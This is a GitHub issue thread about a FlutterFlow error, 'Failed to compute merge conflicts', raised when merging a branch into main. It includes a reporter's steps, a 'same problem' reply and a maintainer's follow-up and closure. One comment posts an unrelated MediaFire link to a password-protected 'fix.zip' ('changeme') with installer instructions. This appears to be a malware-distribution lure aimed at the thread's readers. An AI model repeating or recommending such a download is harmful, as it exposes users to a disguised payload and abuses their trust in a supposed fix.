### ISSUE TITLE
Failed to compute merge conflicts

### ISSUE THREAD

**Issue by Sand-Sherman** [FlutterFlow/flutterflow-issues#3699]
### Can we access your project?

- [X] I give permission for members of the FlutterFlow team to access and test my project for the sole purpose of investigating this issue.

### Current Behavior

- Created a branch off of main.
- Made changes to new branch. 
- Attempt to merge new branch back into main with it's change. 
- Receive error  "Failed to compute merge conflicts" 
- Unable to merge 

### Expected Behavior

- Created a branch off of main.
- Made changes to new branch. 
- Attempt to merge new branch back into main with it's change. 
- Branch merges back into main 
- Main branch is updated

### Steps to Reproduce

1. Create new branch from main 
2. Make changes to new branch. 
3. Attempt to merge branch back into main with updates. 

### Reproducible from Blank

- [ ] The steps to reproduce above start from a blank project.

### Bug Report Code (Required)

IT40u8rnx6V/o8ty+6nqYPZF9RMjOW4DXIBEi8J7aCosfZT2BLMcec/RVERWQtyodwhfMFqamWoW0fT5uPHTNPJcFzCAY4Bqz7tidhbLVkSmVqqnFJWgXHB7OJpWCG6915jYuh4lC7NpS05k7UyMNfCtXhXXQoDpPEgsD6/LZO4=

### Visual documentation

![bug_capture_1](https://github.com/user-attachments/assets/49d1df59-3687-4f49-9966-8216e9960576)

![image](https://github.com/user-attachments/assets/92a3a0c1-e1b5-4633-b628-8e3e0306f85f)

### Environment

```markdown
- FlutterFlow version: 
- Platform:
- Browser name and version:
- Operating system and version affected:
```

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LeonardoPiel** [comment]
I am having same problem here.

**Comment by paulperez-dev** [comment]
Hi @bkballoon! Can you please share the merge conflicts screen result? 

<img src="https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/06defccf-4e96-4aa8-a9e4-ea31334f8ed3/21c1c6dc-8cae-430f-86f3-0a62127beab7?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS8wNmRlZmNjZi00ZTk2LTRhYTgtYTllNC1lYTMxMzM0ZjhlZDMvMjFjMWM2ZGMtOGNhZS00MzBmLTg2ZjMtMGE2MjEyN2JlYWI3IiwiaWF0IjoxNzI0ODcxMTMxLCJleHAiOjMzMjk1NDMxMTMxfQ.FRDDweaHWp0KvS4G-uuYBkZDX_cSAI0wsADwBGu7SDI " alt="Captura de pantalla 2024-08-28 a la(s) 3.51.21 p. m..png" width="684" height="214" />

**Comment by paulperez-dev** [comment]
Closing this issue since we haven't heard back from you. If you are still facing the problem please submit a new issue. Have a great day!
